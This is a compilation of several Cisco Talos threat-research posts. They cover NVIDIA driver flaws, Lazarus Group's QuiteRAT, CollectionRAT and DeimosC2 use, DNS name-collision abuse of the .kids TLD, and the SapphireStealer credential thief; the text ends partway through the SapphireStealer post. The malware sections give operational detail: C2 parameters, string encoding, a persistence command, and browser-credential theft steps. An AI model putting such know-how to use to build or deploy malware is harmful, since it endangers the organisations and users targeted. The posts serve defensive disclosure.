Cisco Talos recently disclosed three vulnerabilities in the shader functionality of the NVIDIA D3D10 driver that works with NVIDIA’s graphics cards.
The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.
All three issues, identified as TALOS-2023-1719 (CVE-2022-34671), TALOS-2023-1720 (CVE-2022-34671) and TALOS-2023-1721 (CVE-2022-34671), have a CVSS severity rating of 8.5 out of 10.
An attacker could exploit these vulnerabilities from guest machines running virtualization environments (such as VMware, QEMU and VirtualBox) to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.
Talos' research also indicates that these vulnerabilities could be triggered from a web browser using WebGL and WebAssembly. Our researchers triggered these issues from a HYPER-V guest using the RemoteFX feature, leading to the execution of vulnerable code on the HYPER-V host (inside the rdvgm.exe process). Microsoft recently deprecated RemoteFX, but older machines may still use this software.
Talos worked with NVIDIA to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.
For Snort coverage (SIDs 61386, 61387, 61398, 61399, 61410 and 61411) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.
In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.
QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.
Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.
Lazarus Group compromises internet backbone infrastructure company in Europe
In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:
The IP address 146[.]4[.]21[.]94 has been used by Lazarus since at least May 2022.
A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:
Domain name for the system.
Domain discovery
[T1087/002]
There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:
C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe
A typical infection chain looks like this:
Lazarus Group evolves malicious arsenal with QuiteRAT
QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.
Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966)— which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.
The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:
The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.
All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.
Configuration strings encoded in the malware.
The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:
Parameter names
Values
Description
mailid
<12 chars from MD4>
The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)
action
“inbox” = send check beacon
“sent” = data is being sent to C2
Signifies the action being taken
body
<base64_xorred_data>
Data to be sent to C2.
param
<Internal/Local IP address>
The internal/LAN IP address of the infected endpoint.
session
<rand>
Pseudo-random number generated by the implant.
The URL for the HTTP GET to obtain inputs from the C2 looks like this:
Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.
The User-Agent used during communications by the implant is
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:
Ping command being constructed by the implant including the octets for a random IP.
The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.
The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.
We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:
QuiteRAT binary name
Compile date
notify.exe (32bit)
May 30, 2022
acres.exe
July 22, 2022
acres.exe (64bit)
July 25, 2022
The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.
QuiteRAT vs MagicRAT
QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.
There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IOCs
IOCs for this research can also be found at our Github repository here.
In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”
CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.
Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.
One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.
Lazarus Group reuses infrastructure in continuous assault on enterprises
In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.
As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.
Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.
In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.
The connections between the various malware are depicted below:
Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2
CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.
CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.
Implant's configuration strings.
The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.
Initial check-in over HTTP to C2 server.
CollectionRAT and its link to EarlyRAT
Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.
Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT
Adoption of open source tools during initial access — DeimosC2
Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.
DeimosC2 analysis
Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.
The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.
Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:
The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.
However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:
The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:
A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.
A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.
The malicious Plink will also create a mutex named “Global\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.
Coverage
Ways our customers can detect and block this threat are listed below.
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: 62248, 62253-62255.
IOCs
IOCs for this research can also be found in our GitHub repository here.
Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.
After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.
Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.
These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.
This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.
For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.
The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the auspiciously named “EPic Games,” which wreaks of the same vibes as a typosquatted domain.
Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.
I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.
But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.
The one big thing
The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.
Why do I care?
Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. With this specific set of RATs, they are smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.
So now what?
Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.
Top security headlines of the week
The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists. The Lazarus Group reportedly is holding onto six separate crypto wallets holding a combined 1,580 Bitcoin over the course of 24 hours earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency agencies could examine their blockchain data and “be vigilant in guarding against transactions directly with, or derived from the addresses.” (TechCrunch, SecurityWeek)
A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia. Security researchers attributed the attack to a new actor known as “Carderbee” that is currently not tied to any state affiliations. The attackers exploited the legitimate Cobra DocGuard software — made by a Chinese software company — to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (the predecessor of PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)
The Clop threat actor was responsible for more than a third of all ransomware attacks in July, according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)
Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with a one-click zero-day exploit.
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.
Most prevalent malware files from Talos telemetry over the past week
When clicking on a name that ends in “.zip” are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.
According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013 when ICANN introduced several new TLDs they also introduced a Name Collision Occurrence Management Framework to deal with the problem.
Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.
Controlled interruption
To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.
The .kids TLD is not alright
One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate.attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.
Hostname lookups on various DNS record types in the .kids TLD.
One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name, ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:
your-dns-needs-immediate-attention.kids
Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”
SCCM requests are issued from various endpoints using a name in .kids.
System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:
“Configuration Manager helps you deliver more effective IT services by enabling:
Secure and scalable deployment of applications, software updates, and operating systems.
Real-time actions on managed devices.
Cloud-powered analytics and management for on-premises and internet-based devices.
Compliance settings management.
Comprehensive management of servers, desktops, and laptops.”
Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.
Systems attempting to relay email through Talos to various email addresses @kids.
Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.
Zombified DNS names
Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.
Typically, when a domain name is not actively registered, a DNS query for that name will generate the response,‘NXDOMAIN’ which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.
.ws ccTLD — Western Samoa
The .ws country-level TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an `NXDOMAIN` response. Rather, the .ws TLD continues to hand out an IP address and MX server:
The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.
.vg ccTLD — The Virgin Islands
The .vg country-level TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.
On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.
In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:
Unsuccessfully attempting to send mail to the implicit MX offered by .vg.
.ph ccTLD — The Philippines
The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45[.]79[.]222[.]138.
Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.
Second-level “TLDs”
Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”
Queries for expired/non-existent domains at com.de return both an IP address and a mail server.
Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.
Unsuccessfully attempting to send mail to the MX offered by .com.de.
A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”
When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:
MX records for the .us.org domain.
The DNS records at us.org are set up in an interesting way. Although they return MX records for our non-existent domain name, if you look carefully at the MX records returned by the DNS we can see that the lowest preference MX is simply a dot [.]. This is a NULL MX setting and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX preference and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may latch onto a lower preference MX and connect to googlemail.com to attempt email delivery.
SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
We assess with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants.
In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.
SapphireStealer goes open-source, attackers take notice
Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.
SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.
As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.
Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.
While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.
SapphireStealer enables simple but effective credential and data theft
SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:
Host information.
Screenshots.
Cached browser credentials.
Files stored on the system that match a predefined list of file extensions.
When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:
chrome
yandex
msedge
opera
If any matching processes are detected, the malware uses Process.Kill() to terminate them. This code execution for Google Chrome is shown below.
Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:
Chrome
Opera
Yandex
Brave Browser
Orbitum Browser
Atom Browser
Kometa Browser
Microsoft Edge
Torch Browser
Amigo
CocCoc
Comodo Dragon
Epic Privacy Browser
Elements Browser
CentBrowser
360 Browser
The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:
%TEMP%\sapphire\work
The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.
Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.
